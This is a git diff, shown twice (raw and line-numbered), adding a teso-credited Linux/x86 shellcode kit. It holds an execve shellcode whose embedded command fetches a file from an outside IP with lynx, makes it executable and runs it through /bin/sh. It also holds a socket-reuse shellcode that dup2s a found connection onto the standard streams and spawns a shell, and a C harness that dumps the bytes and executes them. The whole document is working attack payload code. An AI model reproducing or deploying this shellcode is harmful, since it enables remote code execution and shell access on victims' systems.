3 files changed, 176 insertions, 0 deletions
diff --git a/other/tsig/shellcode/execve-shellcode.s b/other/tsig/shellcode/execve-shellcode.s
new file mode 100644
index 0000000..25015cf
--- /dev/null
+++ b/other/tsig/shellcode/execve-shellcode.s
@@ -0,0 +1,49 @@
+/* 38 byte arbitrary execve PIC linux/x86 shellcode - scut/teso */
+.data
+.globl  cbegin
+.globl  cend
+cbegin:
+        jmp     jahead
+docall:
+        pop     %edi
+        xorl    %eax, %eax              /* read number of arguments */
+        push    %eax
+        movb    (%edi), %al
+        inc     %edi
+decl1:  push    %edi
+decl2:  scasb                           /* search delim bytes */
+        jnz     decl2
+        movb    %ah, -1(%edi)
+        dec     %eax
+        jnz     decl1
+        pop     %ebx                    /* pathname */
+        push    %ebx
+        push    %eax
+        pop     %edx                    /* esp -= 4, edx = &envp[] = NULL */
+        movl    %esp, %ecx              /* ecx = &argv[] */
+        movb    $11, %al
+        int     $0x80
+jahead: call    docall
+/* reverse order arguments */
+.byte   0x03    /* number of arguments */
+.ascii  "lynx -source 123.123.123.123/a>a;chmod +x a;echo ./a"
+.byte   0x03
+.ascii  "-c"
+.byte   0x02
+.ascii  "/bin/sh"
+.byte   0x01
+cend:
diff --git a/other/tsig/shellcode/peername.s b/other/tsig/shellcode/peername.s
new file mode 100644
index 0000000..61cab0a
--- /dev/null
+++ b/other/tsig/shellcode/peername.s
@@ -0,0 +1,79 @@
+.globl  cbegin
+.globl  cend
+cbegin:
+        xor    %ebx,%ebx
+        mov    $0x7,%bl
+        mov    %esp,%edx
+        jmp    label1
+        stos   %al,%es:(%edi)
+        stos   %al,%es:(%edi)
+        stos   %al,%es:(%edi)
+        stos   %al,%es:(%edi)
+        stos   %al,%es:(%edi)
+        stos   %al,%es:(%edi)
+        stos   %al,%es:(%edi)
+        stos   %al,%es:(%edi)
+        stos   %al,%es:(%edi)
+label1:
+        push   $0x10
+        mov    %esp,%ecx
+        push   %ecx
+        push   %edx
+        push   $0xfe
+        mov    %esp,%ecx
+label2:
+        xor    %eax,%eax
+        mov    $0x66,%al
+        int    $0x80
+        test   $0xff,%al
+        jne    label3
+        cmpw   $0x5234,0x12(%esp,1)
+        je     label4
+label3:
+        pop    %edx
+        test   $0xff,%dl
+        je     label7
+        dec    %dl
+        push   %edx
+        jmp    label2
+.ascii "\x38"
+label4:
+        pop    %ebx
+        xor    %ecx,%ecx
+        mov    $0x3,%cl
+label5:
+        dec    %cl
+        xor    %eax,%eax
+        mov    $0x3f,%al
+        int    $0x80
+        jcxz   label6
+        jmp    label5
+label6:
+        push   $0x4
+        push   $0x0
+        push   $18
+        push   $1
+        push   %ebx
+        movl   $102, %eax
+        movl   $14, %ebx
+        movl   %esp, %ecx
+        int $0x80
+        push   $0x0
+        push   $0x0
+        push   $0x68732f
+        push   $0x6e69622f
+        lea    0x8(%esp,1),%ecx
+        lea    0xc(%esp,1),%edx
+        mov    %esp,(%ecx)
+        mov    %esp,%ebx
+        xor    %eax,%eax
+        mov    $0xb,%al
+        int    $0x80
+label7:
+        xor    %eax,%eax
+        inc    %al
+        int    $0x80
+cend:
diff --git a/other/tsig/shellcode/shellcode.c b/other/tsig/shellcode/shellcode.c
new file mode 100644
index 0000000..0239f12
--- /dev/null
+++ b/other/tsig/shellcode/shellcode.c
@@ -0,0 +1,48 @@
+/* shellcode extraction utility,
+ * by typo / teso, small mods by scut.
+ */
+#include <stdio.h>
+#include <stdlib.h>
+#include <ctype.h>
+extern void     cbegin ();
+extern void     cend ();
+int
+main (int argc, char *argv[])
+{
+        int             i;
+        unsigned char * buf = (unsigned char *) cbegin;
+        unsigned char   ex_buf[1024];
+        printf ("/* %d byte shellcode */\n", cend - cbegin);
+        printf ("\"");
+        for (i = 0 ; buf < (unsigned char *) cend; ++buf) {
+                printf ("\\x%02x", *buf & 0xff);
+                if (++i >= 12) {
+                        i = 0;
+                        printf ("\"\n\"");
+                }
+        }
+        printf ("\";\n");
+        printf("\n");
+        if (argc > 1) {
+                printf ("%02x\n", ((unsigned char *) cbegin)[0]);
+                printf ("%02x\n", ex_buf[0]);
+                memcpy (ex_buf, cbegin, cend - cbegin);
+                printf ("%02x\n", ex_buf[0]);
+                ((void (*)()) &ex_buf)();
+        }
+        exit (EXIT_SUCCESS);
+}

diff --git a/other/tsig/shellcode/execve-shellcode.s b/other/tsig/shellcode/execve-shellcode.s new file mode 100644 index 0000000..25015cf --- /dev/null +++ b/other/tsig/shellcode/execve-shellcode.s
@@ -0,0 +1,49 @@
	1	/* 38 byte arbitrary execve PIC linux/x86 shellcode - scut/teso */
	2
	3	.data
	4	.globl cbegin
	5	.globl cend
	6
	7	cbegin:
	8
	9	jmp jahead
	10
	11	docall:
	12	pop %edi
	13
	14	xorl %eax, %eax /* read number of arguments */
	15	push %eax
	16	movb (%edi), %al
	17	inc %edi
	18
	19	decl1: push %edi
	20	decl2: scasb /* search delim bytes */
	21	jnz decl2
	22
	23	movb %ah, -1(%edi)
	24	dec %eax
	25	jnz decl1
	26
	27	pop %ebx /* pathname */
	28	push %ebx
	29
	30	push %eax
	31	pop %edx /* esp -= 4, edx = &envp[] = NULL */
	32	movl %esp, %ecx /* ecx = &argv[] */
	33
	34	movb $11, %al
	35	int $0x80
	36
	37	jahead: call docall
	38
	39	/* reverse order arguments */
	40	.byte 0x03 /* number of arguments */
	41	.ascii "lynx -source 123.123.123.123/a>a;chmod +x a;echo ./a"
	42	.byte 0x03
	43	.ascii "-c"
	44	.byte 0x02
	45	.ascii "/bin/sh"
	46	.byte 0x01
	47
	48	cend:
	49


diff --git a/other/tsig/shellcode/peername.s b/other/tsig/shellcode/peername.s new file mode 100644 index 0000000..61cab0a --- /dev/null +++ b/other/tsig/shellcode/peername.s
@@ -0,0 +1,79 @@
	1	.globl cbegin
	2	.globl cend
	3
	4	cbegin:
	5	xor %ebx,%ebx
	6	mov $0x7,%bl
	7	mov %esp,%edx
	8	jmp label1
	9	stos %al,%es:(%edi)
	10	stos %al,%es:(%edi)
	11	stos %al,%es:(%edi)
	12	stos %al,%es:(%edi)
	13	stos %al,%es:(%edi)
	14	stos %al,%es:(%edi)
	15	stos %al,%es:(%edi)
	16	stos %al,%es:(%edi)
	17	stos %al,%es:(%edi)
	18
	19	label1:
	20	push $0x10
	21	mov %esp,%ecx
	22	push %ecx
	23	push %edx
	24	push $0xfe
	25	mov %esp,%ecx
	26	label2:
	27	xor %eax,%eax
	28	mov $0x66,%al
	29	int $0x80
	30	test $0xff,%al
	31	jne label3
	32	cmpw $0x5234,0x12(%esp,1)
	33	je label4
	34	label3:
	35	pop %edx
	36	test $0xff,%dl
	37	je label7
	38	dec %dl
	39	push %edx
	40	jmp label2
	41	.ascii "\x38"
	42	label4:
	43	pop %ebx
	44	xor %ecx,%ecx
	45	mov $0x3,%cl
	46	label5:
	47	dec %cl
	48	xor %eax,%eax
	49	mov $0x3f,%al
	50	int $0x80
	51	jcxz label6
	52	jmp label5
	53	label6:
	54	push $0x4
	55	push $0x0
	56	push $18
	57	push $1
	58	push %ebx
	59	movl $102, %eax
	60	movl $14, %ebx
	61	movl %esp, %ecx
	62	int $0x80
	63	push $0x0
	64	push $0x0
	65	push $0x68732f
	66	push $0x6e69622f
	67	lea 0x8(%esp,1),%ecx
	68	lea 0xc(%esp,1),%edx
	69	mov %esp,(%ecx)
	70	mov %esp,%ebx
	71	xor %eax,%eax
	72	mov $0xb,%al
	73	int $0x80
	74	label7:
	75	xor %eax,%eax
	76	inc %al
	77	int $0x80
	78	cend:
	79


diff --git a/other/tsig/shellcode/shellcode.c b/other/tsig/shellcode/shellcode.c new file mode 100644 index 0000000..0239f12 --- /dev/null +++ b/other/tsig/shellcode/shellcode.c
@@ -0,0 +1,48 @@
	1	/* shellcode extraction utility,
	2	* by typo / teso, small mods by scut.
	3	*/
	4
	5
	6	#include <stdio.h>
	7	#include <stdlib.h>
	8	#include <ctype.h>
	9
	10	extern void cbegin ();
	11	extern void cend ();
	12
	13
	14	int
	15	main (int argc, char *argv[])
	16	{
	17	int i;
	18	unsigned char * buf = (unsigned char *) cbegin;
	19	unsigned char ex_buf[1024];
	20
	21
	22	printf ("/* %d byte shellcode */\n", cend - cbegin);
	23	printf ("\"");
	24	for (i = 0 ; buf < (unsigned char *) cend; ++buf) {
	25
	26	printf ("\\x%02x", *buf & 0xff);
	27
	28	if (++i >= 12) {
	29	i = 0;
	30	printf ("\"\n\"");
	31	}
	32	}
	33	printf ("\";\n");
	34
	35	printf("\n");
	36
	37	if (argc > 1) {
	38	printf ("%02x\n", ((unsigned char *) cbegin)[0]);
	39	printf ("%02x\n", ex_buf[0]);
	40	memcpy (ex_buf, cbegin, cend - cbegin);
	41	printf ("%02x\n", ex_buf[0]);
	42
	43	((void (*)()) &ex_buf)();
	44	}
	45
	46	exit (EXIT_SUCCESS);
	47	}
	48